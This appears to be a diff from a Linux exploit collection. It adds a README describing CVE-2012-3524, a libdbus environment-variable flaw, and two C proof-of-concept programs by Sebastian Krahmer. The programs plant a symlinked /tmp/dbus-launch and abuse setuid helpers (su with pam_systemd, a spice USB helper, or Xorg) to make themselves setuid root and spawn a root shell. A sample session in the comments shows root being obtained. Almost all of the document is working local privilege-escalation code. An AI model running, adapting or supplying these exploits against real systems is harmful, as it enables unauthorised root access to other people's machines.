linux-exp

2012/CVE-2012-3524/README.md

@@ -0,0 +1,23 @@
+# CVE-2012-3524
+```
+libdbus 1.5.x and earlier, 
+when used in setuid or other privileged programs in X.org and possibly other products, 
+allows local users to gain privileges and execute arbitrary code via the DBUS_SYSTEM_BUS_ADDRESS environment variable. 
+NOTE: libdbus maintainers state that this is a vulnerability in the applications that do not cleanse environment variables, 
+not in libdbus itself: "we do not support use of libdbus in setuid binaries that do not sanitize their environment before their first call into libdbus."
+```
+
+
+Vulnerability reference:
+ * [CVE-2012-3524](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3524)  
+ * [exp-db](https://www.exploit-db.com/exploits/21323/)  
+
+## libdbus
+```
+ 1.5.x and earlier
+```   
+
+
+
+
+

2012/CVE-2012-3524/dd.c

@@ -0,0 +1,115 @@
+/* CVE-2012-3524 PoC (C) 2012 Sebastian Krahmer
+ *  
+ * edited by Pashkela for RDOT.ORG (23.01.2013)  
+ * 
+ * su auto vector (need tty + current user password)
+ *
+ * Trivial non-dbus root exploit. (Yes, it is 2012!)
+ *
+ * The underlying bug (insecure getenv() by default) has been
+ * reported ages ago, but nobody really cared. Unless you have an
+ * exploit...
+ * ==============================================================
+ * Ubuntu 9.04
+ *
+ * an@an-desktop:~$ uname -a
+ * Linux an-desktop 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
+ * an@an-desktop:~$ gcc s.c -o s
+ * an@an-desktop:~$ id
+ * uid=1000(an) gid=1000(an) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(an)
+ * an@an-desktop:~$ ./s
+ * [**] CVE-2012-3524 xSports -- this is not a dbus exploit!
+ *
+ *[*] Preparing ...
+ *[+] Type current user passwd when asked
+ *[*] Waiting 10s for dbus-launch to drop boomshell.
+ * Password: .......
+ * bash: [+] GOT root!: No such file or directory
+ * ...
+ * [!] Hurra!
+ * bash-3.2# id
+ * uid=0(root) gid=1000(an) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(an)
+ * bash-3.2#
+ * ==============================================================
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/signal.h>
+#include <sys/stat.h>
+
+
+int main(int argc, char **argv)
+{
+	int i = 0;
+	struct stat st;
+	pid_t pid = 0;
+	char *env[] = {
+	    "PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin",
+	    "DBUS_STARTER_BUS_TYPE=system",
+	    "DBUS_SYSTEM_BUS_ADDRESS=autolaunch:",
+	    NULL,
+	    NULL
+	};
+
+
+	char *su[] = {"/bin/su",NULL,"[+] GOT root!", NULL};
+
+        char **a = su; 
+	char *dbus[] = {"/tmp/dbus-launch", NULL};
+	char *sh[] = {"/bin/bash", "--noprofile", "--norc", NULL};
+	char me[0x1000];
+
+	if (geteuid() == 0 && argc > 1) {
+		chown("/tmp/dbus-launch", 0, 0);
+		chmod("/tmp/dbus-launch", 04755);
+		exit(errno);
+	} else if (geteuid() == 0) {
+		setuid(0);
+		execve(*sh, sh, NULL);
+		return errno;
+	}
+
+	printf("[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n");
+	memset(me, 0, sizeof(me));
+
+	if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0) {
+		/* Solaris */
+		readlink("/proc/self/path/a.out", me, sizeof(me) - 1);
+	}
+	symlink(me, "/tmp/dbus-launch");
+             printf("[+] Type current user passwd when asked\n");
+	env[3] = "DISPLAY=:7350";
+	su[1] = getenv("USER");
+	a = su;
+
+	if ((pid = fork()) == 0) {
+		execve(*a, a, env);
+		exit(0);
+	}
+
+	printf("[*] Waiting 10s for dbus-launch to drop boomshell.\n");
+
+	for (i = 0; i < 10; ++i) {
+		sleep(1);
+		printf("."); fflush(stdout);
+	}
+	kill(pid, SIGKILL);
+	waitpid(pid, NULL, 0);
+
+	for (;;) {
+		stat(*dbus, &st);
+		if ((st.st_mode & 04755) == 04755)
+			break;
+		sleep(1);
+	}
+	printf("\n[!] Hurra!\n");
+
+	execve(*dbus, dbus, NULL);
+	return errno;
+}

2012/CVE-2012-3524/dzug.c

@@ -0,0 +1,115 @@
+/* dzug.c CVE-2012-3524 PoC (C) 2012 Sebastian Krahmer
+ *
+ * Trivial non-dbus root exploit. (Yes, it is 2012!)
+ *
+ * The underlying bug (insecure getenv() by default) has been
+ * reported ages ago, but nobody really cared. Unless you have an
+ * exploit...
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/signal.h>
+#include <sys/stat.h>
+
+
+int main(int argc, char **argv)
+{
+	int i = 0;
+	struct stat st;
+	pid_t pid = 0;
+	char *env[] = {
+	    "PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin",
+	    "DBUS_STARTER_BUS_TYPE=system",
+	    "DBUS_SYSTEM_BUS_ADDRESS=autolaunch:",
+	    NULL,
+	    NULL
+	};
+
+
+	/* the pam_systemd vector */
+	char *su[] = {"/bin/su", NULL, "blah", NULL};
+
+	/* the spice vector */
+	char *spice[] = {"/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper", NULL};
+
+	/* the Xorg vector, for older Linux dists and Solaris */
+	char *xorg[] = {"/usr/bin/Xorg", ":7350", NULL};
+
+	char **a = xorg;
+	char *dbus[] = {"/tmp/dbus-launch", NULL};
+	char *sh[] = {"/bin/bash", "--noprofile", "--norc", NULL};
+	char me[0x1000];
+
+	if (geteuid() == 0 && argc > 1) {
+		chown("/tmp/dbus-launch", 0, 0);
+		chmod("/tmp/dbus-launch", 04755);
+		exit(errno);
+	} else if (geteuid() == 0) {
+		setuid(0);
+		execve(*sh, sh, NULL);
+		return errno;
+	}
+
+	printf("[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n");
+	memset(me, 0, sizeof(me));
+
+	if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0) {
+		/* Solaris */
+		readlink("/proc/self/path/a.out", me, sizeof(me) - 1);
+	}
+	symlink(me, "/tmp/dbus-launch");
+
+	if (stat(spice[0], &st) == 0) {
+		if ((st.st_mode & 04000) == 04000) {
+			printf("[+] Using spice helper ...\n");
+			a = spice;
+		}
+	} else if (stat("/lib64/security/pam_systemd.so", &st) == 0) {
+		printf("[+] Using pam_systemd helper (type user passwd when asked) ...\n");
+		env[3] = "DISPLAY=:7350";
+		su[1] = getenv("USER");
+		a = su;
+	} else if (stat(xorg[0], &st) == 0) {
+		if ((st.st_mode & 04000) == 04000)
+			printf("[+] Using Xorg helper ...\n");
+		else {
+			printf("[-] No suitable suid helper found.\n");
+			exit(0);
+		}
+	} else {
+		printf("[-] No suitable suid helper found.\n");
+		exit(0);
+	}
+
+	if ((pid = fork()) == 0) {
+		execve(*a, a, env);
+		exit(0);
+	}
+
+	printf("[*] Waiting 10s for dbus-launch to drop boomshell.\n");
+
+	for (i = 0; i < 10; ++i) {
+		sleep(1);
+		printf("."); fflush(stdout);
+	}
+	kill(pid, SIGKILL);
+	waitpid(pid, NULL, 0);
+
+	for (;;) {
+		stat(*dbus, &st);
+		if ((st.st_mode & 04755) == 04755)
+			break;
+		sleep(1);
+	}
+	printf("\n[!] Hurra!\n");
+
+	execve(*dbus, dbus, NULL);
+	return errno;
+}